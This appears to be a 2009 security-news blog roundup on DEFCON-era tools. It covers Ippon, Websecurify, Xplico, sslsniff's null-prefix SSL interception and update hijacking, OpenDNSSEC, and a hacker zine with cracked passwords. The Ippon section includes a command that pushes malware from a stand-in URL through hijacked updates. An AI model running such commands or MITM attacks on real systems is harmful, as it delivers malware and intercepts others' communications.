Sekurity_Matters

A new tool was announced at DEFCON17 by researchers Itzik Kotler and Tomer, Ippon compromises the automatic update mechanisms used by applications, making it think that a new update is available and instead of having the actual update, the file passed is actually a malware or rootkits. According to Kotler there are over 100 applications vulnerable to this attack.

ATTACK:
——-

./ippon.py -w -i eth1 targets.xml -v -u http://linktomalware.com

Download: IPPON_dc17.zip

Websecurify is a Web Application Security Scanner.

Here are some of the key features of Websecurify:

1. It is 100% open source, GPL, CC product, ready to benefit the open source movement
2. The engine employs technologies, such as Web Workers, from the latest HTML5 specs
3. Most of the code is written in JavaScript but many parts can be rewritten or extended with Python, Java and C
4. The core engine can be taken out from the binary bundles and used as part of self-defending web applications. I will talk about this soon.
5. The testing and reporting mechanisms are asynchronous. This means that the report is cooking while the test is performed. It also means that decisions are taken immediately, i.e. they are not scheduled.
6. The tool is cross-platformed thanks to xulrunner
7. Everything is written with extensibility in mind
8. It can be extended in pretty much the same way you can extend Firefox and Thunderbird

Download: websecurify.dmg
Download: websecurify.source

Xplico is an open source Network Forensic Analysis Tool (NFAT) that allows for data extraction from traffic captures. It supports extraction of mail from POP, IMAP, and SMTP, can extract VoIP streams, etc. This is the version that has a GUI allowing you to view photos, texts and videos contained in MMS messages.

Dissectors: Ethernet, pcap, ipv4, ipv6, PPP, sll, tcp (2 type), udp, dns, ftp, http, icmp, imap, ipp, mms, pjl (Printer Job Language), pop, sdp, smtp, tftp, l2tp (instable), vlan (instable).
Reverse dns using only the DNS traffic in the PCAP file.

Website: www.xplico.org
Download: xplico-0.5.2.tgz

Version 0.6 has been significantly updated to additionally support the null-prefix attacks that I demonstrated at BlackHat 09 and Defcon 17. These allow for completely silent MITM attacks against SSL/TLS in the NSS, Microsoft CryptoAPI, and GnuTLS stacks — ultimately allowing for SSL communication in Firefox, Internet Explorer, Chrome, Thunderbird, Outlook, Evolution, Pidgin, AIM, irssi, and every other client that uses the Microsoft CryptoAPI to be intercepted.

sslsniff has also been updated to support the OCSP attacks that I published at Blackhat 09 and Defcon 17, thus making the revocation of null-prefix certificates very difficult. Additionally, sslsniff now supports modes for hijacking auto-updates from Mozilla products, as well as for Firefox/Thunderbird addons. Attackers can specify payloads of their choice, which will be delivered to the targets being man-in-the-middled.

sslsniff is useful for deploying other vulnerabilities as well. This is the tool that the people who pulled the recent MD5 hash collision publicity stunt used to demonstrate MITM attacks with their rogue CA-certificate. Also, anyone who is capable of obtaining a forged certificate by any means can easily deploy it through sslsniff with the targeted mode designed for null-prefix attacks.

Read the: Paper
Watch the: Video
Download the: Tool

Europeans want to put an end to DNS abuse.

London, 30th July 2009 – The OpenDNSSEC project announces the development of Open Source software that manages the security of domain names on the Internet. The project intends to drive adoption of Domain Name System Security Extensions (DNSSEC) to further enhance Internet security.

Industry leaders including .SE (The Internet Infrastructure Foundation), NLNetLabs, Nominet, Kirei, SURFnet, SIDN and John Dickinson have come together to create open source software that promises to make it easier to deploy DNSSEC. The group’s primary aim is to further protect the Internet by increasing the security for end-users.

Removing the manual aspect of deploying DNSSEC using the open source software is set to make it easier for Internet service providers, web hosting companies and name service operators to deploy DNSSEC, which will significantly increase the number of DNSSEC users.

Specialists can download a preview of the OpenDNSSEC technology in order to gain experience with the OpenDNSSEC software, and give feedback to the project.
(By opendnssec.org)

Wow talk about repercussion, in this new edition ZF0 is mocking Kevin Mitnick, Dan Kaminsky, PerlMonks, RoMeO (exposed anti-sec member) and then some.
One of the things that caught my attention was to see Randals Schwartz name on the password cracked list, I know, I know, no one is immune, but I just wasn’t expecting it.

Read it here: ZF05

Howdy folks!!! I’ve decided to take it a step further, from now on we’re also going to have a website, where I intend to post the lastest news on IT Security.